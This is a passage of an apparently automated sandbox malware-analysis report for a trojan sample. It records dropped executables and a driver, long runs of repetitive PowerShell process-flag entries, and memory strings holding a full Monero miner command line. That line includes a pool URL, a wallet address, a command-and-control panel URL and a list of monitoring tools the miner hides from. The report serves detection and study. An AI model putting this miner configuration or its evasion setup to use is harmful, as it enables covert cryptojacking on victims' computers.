          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeStatic PE information: section name: .00cfg
          Source: bbecxurdegum.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeCode function: 0_2_00007FF7CA381394 push qword ptr [00007FF7CA38A004h]; ret 0_2_00007FF7CA381403
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeCode function: 16_2_00007FF7794E1394 push qword ptr [00007FF7794EA004h]; ret 16_2_00007FF7794E1403
          Source: C:\Windows\System32\conhost.exeCode function: 20_2_0000000140001394 push qword ptr [0000000140009004h]; ret 20_2_0000000140001403

          Persistence and Installation Behavior

          barindex
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeFile created: C:\Windows\TEMP\clwjpwuuvdte.sysJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeFile created: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeJump to dropped file
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeFile created: C:\Windows\Temp\clwjpwuuvdte.sysJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeFile created: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeJump to dropped file
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeFile created: C:\Windows\Temp\clwjpwuuvdte.sysJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PHVUTTIO"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: svchost.exe, 00000017.00000002.3318737467.0000021073480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXELPER
          Source: svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:8080--USER=4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR--PASS=X--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=CLWJPWUUVDTE.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTP://195.10.205.253/PANEL/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--CINIT-IDLE-WAIT=15--CINIT-IDLE-CPU=70--CINIT-ID=MCQQAJUOIBLHNZUH
          Source: svchost.exe, 00000017.00000003.2133808985.000002107346B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://195.10.205.253/PANEL/API/ENDPOINT.PHPMCQQAJUOIBLHNZUH
          Source: svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEVXY81NT
